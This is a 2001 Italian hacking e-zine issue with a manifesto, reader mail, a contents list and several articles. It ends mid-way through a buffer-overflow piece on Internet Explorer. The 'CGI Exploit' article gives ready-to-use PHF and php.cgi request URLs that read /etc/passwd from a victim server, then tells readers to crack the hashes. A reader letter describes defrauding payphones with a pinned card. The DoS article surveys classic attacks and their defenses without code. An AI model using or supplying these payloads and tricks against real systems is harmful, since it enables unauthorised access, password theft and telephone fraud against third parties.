{1/05/01} ,`^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^`, {| | |\ | |¯\ |¯ |¯| |¯| |¯| |¯| | | |\ | |¯\ |\/| /¯\ |¯_ /¯\ ¯/ | |\| |¯ |¯ |¯| |¯ \ \/ /} {|_| | \| |_/ |¯ |¯\ | | |¯\ |_| |_| | \| |_/ | | |¯| | | |¯| /_ | | | |¯ |_ |¯\ |¯ \/\/ } { ¯ ¯ ¯ ¯ ¯ } '^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^' __ __ ___ __ ___ __ _|_ __ |__) | ` (-_ __) (-_ | ) |_, (__( | ###################################################################### # __ __| __ __ __ __ __ __ __| # # (__) | ) (__| (-_ | ` (__| | ` (__) (__) | ) (__| # # __/ # ###################################################################### # __ __ __ __ __ __ o __ __ # # | ) ) (__| (__| (__| (__ | | ) (-_ # # __/ # ###################################################################### |''''''''''''| ___[ Numero 1 ]___ [ Anno 1-Maggio 2001 ] [ Underground Magazine ] [ Festa dei lavoratori ;)] ························ ERA ORA! 5 mesi sono passati dall'uscita del primo numero (vi avevo avvertito ke l'uscita era "aperiodika" ;o)), vi assicuro ke questo numero è di qualità nettamente superiore al precedente, questa volta abbiamo seguito il detto "poki ma buoni" ;o) Poko prima dell'uscita di questo numero si sono uniti alla nostra crew 3 nuovi elementi: FeltonSpray (i cui artikoli vengono ospitati anke da hackerzine e tankcommandos); Jrash (che scrive anke per DirtyNet, sono artikoli diversi, naturalmente :)) e SpaceIce. Nel sekondo numero sono state aggiunte le sezioni IRC, VIRII e OTHER (kontenente traduzioni e materiale vario), inoltre troviamo la prima parte di una "guida ad Unix" skritta da Rhost, un korso di C ed un artikolo su Delphi (non esiste solo il C! :Þ), continua la guida al buon vekkio Pascal... ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××MANIFESTO×××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× Siamo hackers, newbies, phreakers, smanettoni, anarchici e rivoluzionari di un sistema che ci va ormai stretto. Siamo "gente comune", molto diversa fra noi, ma siamo un gruppo, un gruppo unito da un desiderio comune: rivoluzionare il Sistema; oguno a suo modo (l'hacker e il cracker grazie alle loro conoscenze informatiche, il phreaker grazie alle sue capacità tecniche, ...), ma tutti uniti per un mondo diverso, migliore, che rispetti le idee e la libertà di tutti. Vi sembrerà un'utopia, la fantasia di una mente malata (ah, grazie :o), ma qualcuno dovrà pur cominciare... ;o) ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××DisclaimerD××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ______________________ / . . (<$$$$$>Disclaimer<:::::>) . . . _/~~~~~~~~~~~~~~~~~~~~~~~~~~\_ . . . \ .( . . /~ ~\ . . . ( . . .~ ~. . ) ()\/_____ _____\/() . . ). ( .-'' ~~~~~~~~~~~~~~~~~~~~~~~~~~~ ``-. ... . . . .-~ __________________ ~-. . / . ..`~~/~~~~~~~~~~~~TTTTTTTTTTTTTTTTTTTT~~~~~~~~~~~~\~~' . ) . . .| | | #### #### || | | | [] | | | || #### #### | | | . ( ;__\|___________|++++++++++++++++++|___________|/__;. . . (~~====___________________________________====~~~) ( . .. \------____________[-PULA-]______________------/ .. . ) . | || ~~~~~~~~ || | \_____/ \_____/ Disclaimer: L'UNDERGROUND MAGAZINE CREW NON SI ASSUME ALCUNA RESPONSABILITA' PER IL "MAL" UTILIZZO DI QUESTA E-ZINE ED IMPONE A COLUI CHE VUOLE CONTINUARE QUESTA LETTURA I SEGUENTI TERMINI: "NON INCOLPERO' ALCUN MEMBRO DELL'UMC, NESSUNO ATTRAVERSO IL QUALE HO RICEVUTO QUESTA RIVISTA, NESSUNO CHE HA COLLABORATO IN QUALSIASI MODO ALLA CREAZIONE DI QUEST'E-ZINE; ACCETTO IL FATTO CHE QUESTO TESTO E' NATO PER IL SINGOLO SCOPO DI INFORMARE IL LETTORE E NON VUOLE IN ALCUN MODO INDURLO A COMPIERE AZIONI ILLEGALI; COMPRENDO INOLTRE CHE INFORMARE NON E' ILLEGALE. ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ,·······,________________________________________________________________ |ANNUNCI| 1)Chiunque voglia scrivere per Underground Magazine e si sente`'. `·······` all'altezza ;] di far parte dell'UM Crew mi scriva a questo | indirizzo: | cookbooker@libero.it con il subject "UMc richiesta vollaborazione". | 2)Chi non ha tempo, non se la sente o semplicemente si vergogna :) di | scrivere per noi ma vuole collaborare mi scriva (cookbooker@libero.it) | segnalandoci errori (subject: UM errori), news (subject: UM news) o | qualsiasi altra cosa. | Le sue e-mail, se verranno ritenute interessanti, verranno pubblicate | nel prossimo numero. ` '-------------------------------------------------------------------------' ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××× allegati ×××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× »MailFucker contiene i sorgenti e l'eseguibile di un anonymailer fatto in delphi, riguardante l'artikolo "Anonymailer in Delphi"; »Bat2Com serve a convertire file .bat in .com; riguardante l'artikolo di Jrash sui trojan; »Unix.doc contiene la prima parte della guida originale ad Unix di Rhost; ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××× errori ××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× Potevano mankare degli errori? a quanto pare no.. eheh 1) Nel precedente numero ho dato una definizione konfusa di proxy (una specie di incrocio fra proxy e socks), mi giustifiko dicendo ke era molto tardi ed ero mezzo rinkoglionito... mi appello alla clemenza della corte... :) e vi do una definizione più giusta: (ma sarà veramente giusta?:)) I proxy servono a garantire una certa anonimità nella visita di siti facendo da "ponte" tra il sito e voi... insomma da un analisi superficiale risulterà ke non avete visitato quel sito, i proxy, normalmente, usano la porta 80. 2) (N.d.R. La seguente nota è tratta da un'e-mail inviatami da SpaceIce) -Guida a Linux Red Hat di BUDDAMONK- Come tu hai affermato all'inizio tali appunti liberi sono di un altra persona: Appunti di informatica libera 2000.07.31 --- Copyright (c) 2000 Daniele Giacomini -- daniele@swlibero.org --- Bene...ci sono errori macroscopici...ma forse macro è dire poco...mastodontici...tale Daniele Giacomini spero non abbia usato sta roba in esami :) ....in tutti gli appunti la Redhat siglata come GNU/Linux....ma siamo pazzi!!!! ....la Redhat NON è mai stata della GNU...è nata il Dicembre 1994...ed era commerciale allora...esattamente come lo è oggi....non a caso esistono versioni diversificate della Redhat,quella free...ke non lo è...dovrei dire evaluation....ossia di prova...ke cmq è a tutti gli effetti funzionale al 100% anke questa per un uso privato per imparare...è composta da molti meno tools di quelle a pagamento...te lo dice il fatto ke proprio questa occupa al massimo 2 cd,mentre la deluxe edition 7 cd, e la professional server 11 cd....non penso ke siano vuoti tutti questi cd :) L'unica distro GNU..è come sai la debian...e non ce ne sono altre. Anzi la stessa GNU sta spostando il suo progetto verso Hurd ke non è + Linux, ma un ambiente unix a parte...anke se la debian/linux viene ancora sviluppata in parallelo alla debian/hurd. Altra affermazione errata "Ci sono distribuzioni che "derivano" dalla Red Hat in quanto utilizzano il formato RPM, Red Hat Package Manager"....ormai l'archivio RPM è passato come standard tra le distro...e non vuoldire ke se una distro le usa allora è derivata dalla Redhat...diciamo ke ci sono buone possibilità ke ne derivi ma non è certo...sicuramente ci si voleva rifare al caso Linux Mandrake, ke in origine era una Redhat con svariati tool e autoconfigurazioni varie...dalla ver 7 la Mandrake NON è + una Redhat a tutti gli è effetti ma una distro a parte. A fine appunti "GNU/Linux Mandrake" ...stesso discorso iniziale la Mandrake non è GNU. 3) Nel numero precedente ho dato i links sbagliati di tuttoscript e mondoscript, i links esatti sono i seguenti: www.tuttoscript.net www.mondoscript.net Ühm... gli errori DOVREBBERO essere finiti, almeno spero... ;) Se volete segnalarcene degli altri scrivetemi a cookbooker@libero.it e usate kome oggetto "UM errori". Al prossimo errore! ;o) ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××× LinkZ ×××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××»Nome«××××××××××××»Indirizzo«×××××××××××××××»Genere«×××××× ×UMCrew----------->www.umcrew.con------------>e-zine<------× ×HackerZine------->www.hackerzine.org-------->e-zines<-----× ×Spippolatori----->www.spippolatori.com------>e-zine<------× ×2600------------->www.2600.con-------------->e-zine<------× ×TuttoScript------>www.tuttoscript.net------->IRC<---------× ×MondoScript------>www.mondoscript.net------->IRC-Script<--× ×PuntoInformatico->www.punto-informatico.it-->NewZ<--------× ×HackerNews------->www.hackernews.com-------->NewZ<--------× ×NubeHack--------->www.nubehack.com---------->Hacking<-----× ×TLSecurity------->www.tlsecurity.net-------->INsecurity<--× ×Bismark---------->www.bismark.it------------>Underground<-× ×AstaLaVista------>http://astalavista.box.sk->CrackZ<------× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××»Membro«××××××××××»Indirizzo«××××××××××××××××××××××××××××× ×Cookbooker------->www.cookbooker.com<---------------------× ×----------------->tuxhack.cjb.net<------------------------× ×Ulisses1--------->ulisses1.tsx.org<-----------------------× ×FeltonSpray------>spazioweb.inwind.it/felton<-------------× ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××× ..... ×××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××× |Posta| ××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××× ····· ×××××××××××××××××××××××××××××××××××××××××××××××××× 1)da: "Lorenzo" (N.d.R. non quello del Grande Fratello... ;)) × Ciao a tutti... × Prima di tutto complimenti x la rivista,è l'a seconda cosa ke leggo dopo i × giornali automobilistici... × Volevo dirvi un trukketto x le cabine telefonike,nel caso vi interessi: × avete bisogno di 2 skede telefonike,1 vuota e 1 con almeno l'importo minimo × x una kiamata e uno spillino da cucito.Inserite la skeda con l'importo × minimo nella cabina telefonica e componete il numero...quando scade xke × avete finito i soldi inserite la skeda vuota con lo spillino ancorato nel × pezzo finale della skeda,il lettore continuera a "kiamare" la skeda,ma essa × bloccata non entrera mai e quindi potrete restare al telefono fino a quanto × vorrete. × Ricordatevi,molto importante,ke la skeda iniziale ke avete iserito,non va × tolta dalla fessura + bassa del lettore,se la toglierete la comunicazione si × interromperà. × × ... × × P.S.---->continuate con la vostra rivista xke è interessante Cerkeremo di accontentarti... ;o) 2)da: "Lupin" (cioè... non è ke un cartone animato giapponese degli anni 70 ci abbia mandato 'na mail... è solo il suo nick... :P) × sinceramente trovo la vostra zine molto al di sotto di quelle che oggi l underground italiano × offre ;D niente da dire pero ;D siete stati grandi per l iniziativa ma per me dovreste × concentrarvi un po di piu sui contenuti ;D di fatto titoli come × × |^'<>################################################################<>'^| × |>>Come farsi una shell------<<<<'^^'<<<<<<<<<>>>>>>>>>>>>>>>>| × |>>Installare Linux Slackware<<<<'^^'<<<<<<<<<>>>>>>>>>>>>>>>>| × |>>Un primo passo verso Unix-<<<<'^^'<<<<<<<<<>>>>>>>>>>>>>>>>| × |>>Appunti/guida alla RED HAT<<<<'^^'<<<<<<<<<>>>>>>>>>>>>>>>>| × × si sono già visti anke su giornali tipo linux & C per cui una zine elettronica dovrebbe × offrire cose che nn si trovano tanto facilmente (vedi che ne so il progetto ninja o onosendai × di fusys ;) per cui niente da dire sulla zine ma sui contenuti si ;D nn che siano da buttare × anzi se vedete bfi1 e bfi 4 o 5 i contenuti sono migliorati totalmente quindi vi faccio gli × auguri ;D di poter migliorare . × NN ne faccio una accusa ma è solo un commento questa mail × × ciao a tutti LUPIN Beh... e kosì sono arrivati anke i tanto odiati kommenti... >:\ cmq... l'autore degli artikoli ke hai kommentanto si è preso una vakanza a lungo termine... ehhe spero ke almeno questo numero ti abbia soddisfatto. :o) ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»««««««««««««««««««««««««««««««««««««««««««««« «»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»[SOMMARIO]«««««««««««««««««««««««««««««««««««««««««» »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»««««««««««««««««««««««««««««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××[INTRO]×××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× »»»»»»»»»»»»[TITOLO]««««««««««««««««««««««««»»»»»»»»»»»»»»»»»»»»»»»»[AUTORE]««««««««««««««««« ×»Introduzione««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»Manifesto«««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»Disclaimer««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»Annunci«««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»Allegati««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»Errori««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»LinkZ«««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»Posta«««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker-lettori««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××[HACKING]××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×»Denial Of Service (parte 2)«««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»CGI Exploit«««««««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray«««««««««««««««««««««««««« ×»Buffer overflows««««««««««««««««««««««««««»»»»»»»»»»»»Cujo««««««««««««««««««««««««««««««««« ×»WU-FTP 2.4(1) EXPLOIT«««««««««««««««««««««»»»»»»»»»»»»Jrash«««««««««««««««««««««««««««««««« ×»Fottere le password in Linux««««««««««««««»»»»»»»»»»»»FeltonSpray«««««««««««««««««««««««««« ×»TUTTO SU "NMAP"«««««««««««««««««««««««««««»»»»»»»»»»»»Jrash«««««««««««««««««««««««««««««««« ×»IIS Bugs««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Ulisses1««««««««««««««««««««««««««««« ×»IP Spoofing«««««««««««««««««««««««««««««««»»»»»»»»»»»»Cujo««««««««««««««««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××[PROGRAMMING]××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×»Pascal, lesson 2««««««««««««««««««««««««««»»»»»»»»»»»»EvilAngel«««««««««««««««««««««««««««« ×»Guida al C««««««««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray«««««««««««««««««««««««««« ×»AnonyMailer in Delphi«««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××[PHREAKING]×××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×»Fottiamo il 112«««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray«««««««««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××[Linux & Unix]×××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×»LOADABLE KERNEL MODULE««««««««««««««««««««»»»»»»»»»»»»Ulisses1««««««««««««««««««««««««««««« ×»Shell«««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray«««««««««««««««««««««««««« ×»Ricompilazione del Kernel«««««««««««««««««»»»»»»»»»»»»FeltonSpray«««««««««««««««««««««««««« ×»Guida ad Unix«««««««««««««««««««««««««««««»»»»»»»»»»»»Rhost«««««««««««««««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××[NARCOZ]××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×»NARCOS(o qualcosa del genere)«««««««««««««»»»»»»»»»»»»Freesto«««««««««««««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××[WRITING]×××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×»WrItInG«««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Freesto«««««««««««««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××[IRC]×××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×»Kome installare un bot««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»TakeOver!«««««««««««««««««««««««««««««««««»»»»»»»»»»»»FeltonSpray«««««««««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××[VIRII]××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×»Cataloghiamo i virus informatici««««««««««»»»»»»»»»»»»Jrash«««««««««««««««««««««««««««««««« ×»Guida alla creazione di trojan««««««««««««»»»»»»»»»»»»Jrash«««««««««««««««««««««««««««««««« ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×××××××××××××××××××××××××××××××××××××××××××××[OTHER]××××××××××××××××××××××××××××××××××××××××× ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× ×»NewZ««««««««««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« ×»Come Fregare le macchinette dei POKER...««»»»»»»»»»»»»FeltonSpray«««««««««««««««««««««««««« ×»Backdoor nel modem ADSL Alcatel?««««««««««»»»»»»»»»»»»Cujo««««««««««««««««««««««««««««««««« ×»Creare cd protetti««««««««««««««««««««««««»»»»»»»»»»»»SpaceIce««««««««««««««««««««««««««««« ×»Conclusione«««««««««««««««««««««««««««««««»»»»»»»»»»»»Cookbooker««««««««««««««««««««««««««« «»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»««««««««««««««««««««««««««««««««««««««««««««» ___________________________________________________________ | _ _ ___ _____ _ _ _ __ _ _____ | | | | | | / | / ___| | | / / | | | \ | | / ___| | | | |_| | / /| | | | | |/ / | | | \| | | | | | | _ | / / | | | | | |\ \ | | | |\ | | | _ | | | | | | / / | | | |___ | | \ \ | | | | \ | | |_| | | | |_| |_| /_/ |_| \_____| |_| \_\ |_| |_| \_| \_____/ | ----------------------------------------------------------- ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× _ __| ___ __ o __ | __ _|_ __ ___ __ o __ ___ (__| (__/_ | ) | (__( |_, (__) | __) (__/_ | ' (__| | (___ (__/_ ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Denial Of Service (parte 2)] [Autore: Cookbooker] [Tempo utilizzato: troppo :P] [Saluti: saluto tutta la Crew del chan #olimpo :* ] Nell'ultimo numero abbiamo spiegato il funzionamento di uno smurf attack e abbiamo fatto una veloce panoramika degli altri attakki di tipo "Denial Of Service" (attakki ke negano un servizio). Ora voglio approfondire l'argomento, spiegando il funzionamento degli altri attakki DoS più utilizzati. [ TEARDROP ] L'attakko: i pakketti IP hanno una lunghezza massima di 64 Kb ma, dato ke la maggior parte delle skede di rete non è in grado di gestire pakketti kosì grandi, vengono frammentati in pakketti di minor grandezza ke verranno poi rikomposti una volta giunti a destinazione. A questo punto vi potreste kiedere "kosa succederebbe se le informazioni kontenute nel pakketto IP destinate al riassemblamento del pakketto fossero sabotate e inkomporensibili?" il sistema della vittima andrebbe in crash nel tentativo di rikomporre i pakketti (o al limite la konnessione della vittima verrebbe notevolmente rallentata)! :) La difesa: per difenderci dalla "versione standard" di questo attakko ci basta aggiornare il nostro sistema kon le WinSock2.2. Sistemi operativi affetti: Windows 3.1/95/NT. [ IP SPOOFING ] L'attakko: Il camuffamento del proprio indirizzo IP (IP Spoofing) può essere utilizzato per inviare alla vittima un messaggio SYN contenente un indirizzo IP inesistente, la vittima cerka di rispondere inviando un messaggio SYN-ACK dopodikè rimane in attesa del messaggio ACK ke non arriverà mai dato ke l'IP a kui ha rikiesto l'ACK è inesistente. Ripetendo velocemente questo procedimento (prima ke l'host si akkorga ke sta "parlando al muro" ;) impediremo alla vittima di soddisfare le altre rikieste di servizio. La difesa: non è possibile uscire del tutto indenni da questo attakko, tuttavia è possibile limitare i danni akkorciando il tempo massimo di una rikiesta di konnessione. Sistemi operativi affetti: tutti. (N.d.R. guarda l'artikolo di Cujo per ulteriori approfondimenti :) [ PING OF DEATH ] L'attakko: la maggior parte dei sistemi operativi (da Windows a buona parte dei sistemi UNIX) non rieskono a gestire un pakketto ICMP di tipo echo di dimensioni superiori ai 64 Kb. Se noi ne inviamo uno dalle dimensioni eccessive, il sistema va in crash. La difesa: è possibile configurare il proprio firewall in modo da ignorare le rikieste ICMP o semplicemente è possibile aggiornare il proprio sistema operativo. Sistemi operativi affetti: Windows 95/NT. [ LAND ] L'attakko: inviando un pakketto SYN contenente porta o IP Address sbagliati kauseremo un blokko del sistema della vittima. La difesa: è necessario un aggiornamento del sistema operativo. Sistemi operativi affetti: Windows 3.1/95/NT. [ PING PATTERN ] L'attakko: inviando alla vittima il komando ATH0+++ il modem si diskonnette. La difesa: Start\Impostazioni\Pannello di controllo\Modem\Proprietà modem\Connessione\Avanzate\Altre impostazioni\ modificate il valore S2 in S2=255; se questo è troppo komplikato (spero di no... :P) kambiate modem! :oÞ Modem affetti: fino a qualke tempo fa ne erano affetti tutti tranne gli U.S.Robotics (il mio :o)) ora non so.. kredo ke questo bug sia stato korretto nei modem più recenti. [ BLOOP ] L'attakko: invia in modo casuale pakketti ICMP mandando in crash il sistema. Questo attakko può essere effettuato solo da sistemi Unix. La difesa: prokuratevi un buon firewall :P Sistemi operativi affetti: WinZozZo 95/98 NT. [ OOB ] L'attakko: ki non rikorda il buon vekkio WinNuke? :°) questa utility è stata, probabilmente, la prima a generare un attakko di tipo DoS. Il WinNuke inviava dati Out Of Band (OOB) sulla porta utilizzata da NetBios (grazie Bill!;) kausando la ben nota skermata blu o, a volte, il blokko del sistema. La difesa: ormai questo attakko viene utilizzato sporadicamente... diciamo ke l'ho messo per nostalgia... hehe... cmq per difendersi da questo attakko basta aggiornare l'O.S. kon WinSock2.2 o applicare una semplice patch rilasciata da Micro$oft. Sistemi operativi affetti: Window$ 3.1, 95 ed NT. [ IGMP FLOOD ] L'attakko: questo attakko konsiste in un flood di pakketti IGMP ke provocano un rallentamento nel sistema della vittima fino al crash completo. La buona riuscita di questo attakko è favorita da una veloce konnessione dell'attakkante. Sistemi operativi affetti: TUTTE le versioni di Windoze :o) ßyeZ. Cookbooker. ··············································································· ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× __ __ o ___ \_' __ | __ o _|_ (___ (__| | (__/_ / \ |__) |_, (__) | |_, __/ | ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: CGI Exploit] [Autore: FeltonSpray] Disclaimer Raga io non mi assumo nessuna responsabilità per le cazzate che fate, questo testo è stato solo scritto per informarvi e per provare questa tecnica sul vostro sistema! Adesso Facciamo un'intro su che cosa sono le CGI! Le CGI non sono altro che dei semplici script usati dagli utenti su di un server. Questi script a volte girano sotto permessi r00t e si possono usare degli exploit per far eseguire al programma certi comandi arbitrii che di sicuro l'ADM non vorrebbe. hihhiihi Credo che più o meno conosciate tutti il PHF visto che all'inizio tutti abbiamo letto la mitica guida di Lord_Shinva beh cmq ve la riporto lo stesso ve la spiego e vi dico una tecnica che non so se conoscono tutti, io l'ho imparate diverso tempo fà e vi garantisco che nei server in cui gira da root funziona e come! http://www.vittima.gov/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Questo è un'esempio di phf che se lo trovate nel sistema con permessi r00t nel vostro bel browser troverete chissà come mai il file DELLE PASS =) http://www.vittima.gov >--> la nostra vittima (mmm non credo che dobbiate usare .gov ;p) cgi-bin/phf >--> Richiamiamo la cartella cgi-bin e gli diciamo di prendere il phf! ? >--> serve a far capire che stiamo eseguendo comandi sul phf Qalias=x%0a/bin/cat%20/ >--> Usatelo solo per prendere file di pass anche se potete richiamare qualsiasi comando (VEDETE CHE LO STESSO VENITE LOGGATI!) /etc/passwd >--> Il percorso di passwd (potete anche mettere /etc/shadow) Se tutto funziona avete nel video del browser il file con le pass, copiatele in un txt e datelo in pasto ai pescecani! ehm scusate in pasto a John The Ripper =) Adesso che vi ho spiegato il phf vi spiego l'exploit che volevo dirvi, non l'ho scoperto io quindi do i crediti a chi l'ha scoperto ma non so il nome quindi... (Volevo solo informarmi così non mi dite che sono un lamer del cazzo che rippa!) Prima di tutto vi insegno il comando per vedere quali CGI sono presenti in /cgi-bin/ http://www.vittima.gov/cgi-bin/test-cgi?* EKKO IL COMANDO: http://www.vittima.gov/cgi-bin/php.cgi?/etc/passwd Beh io lo giudico molto più pratico del phf, fa la stessa cosa ed in più il phf è conosciuto da tutti gli admin ed esistono software specifci per far vedere se il server sta subendo un'attakko PHF. Anche queste volta siamo alla conslusione del TXT :-( spero che i newbies con questa lettura abbiano capito come utlizzare questo exploit, come vedere in un server che CGI sono presenti, etcc A presto raga ciao ciaooooooooooo []---[FeLtOnSpRaY]---[] []---[ feltonspray@katamail.com ]---[] ··············································································· ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× _ _ _ |__ _|_ _|_ ___ __ __ ___ __ _|_ | __ __ |__) (__(_ | | (__/_ | ' (__) (__| (__/_ | ' | |_, (__) (__(__( __) ×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××× [Titolo: Shell & Stack or Buffer overflow] [Autore: Cujo] Come sfruttare i bachi di programmazione. Immagino che molti di voi sappiano cos'è un overflow,soprattutto se messo in relazione col buffer. Gli exploit basati sugli overflows,infatti,sfruttano le limitate dimensioni in kb di un buffer o,x quanto riguarda lo shell overflow,la capacità di gestire una serie di caratteri molto lunga. /* Ms I.E. Folder Shell Extension Buffer Overflow */ Nome alquanto lungo ( non x altro siamo in tema... :) ) x descrivere un bug ancora presente in I.E. 5. Il programma,infatti, non è capace di gestire directory con nomi molto lunghi.Un modo x sfruttare uqesto bug è quello di fare un link ad una directory dal nome molto grande Es: href="ftp://ftp.microsoft.com/longstring" oppure aprendo directory anch'esse di diversi caratteri,fino a quando il buffer va in overflow. La cosa interessante è che è possibile sfruttare questo bug anche attraverso gli ActiveX ( veramente pericolosi,anche perchè le loro potenzialità sono sconosciute ai più ). Allego una parte scritta in inglese,perchè mi sembra doveroso nei confronti di Shane che ha sfruttato il bug tramite gli ActiveX,in caso di sviluppi mi aggiornerò al + presto. I have managed to trigger the fault at various addresses. In SHELL32.DLL v 4.72.3110.6 @7FCE2373 In MSIEFTP.DLL v 5.00.2014.209 @71211EE9 @71215C92 @712121D8 @71215BE6 This last address is interesting, it appears to be code which is called when an invalid/not existing directory is attempted to CWD to, at this address is the following code; mov edx, [eax] lea 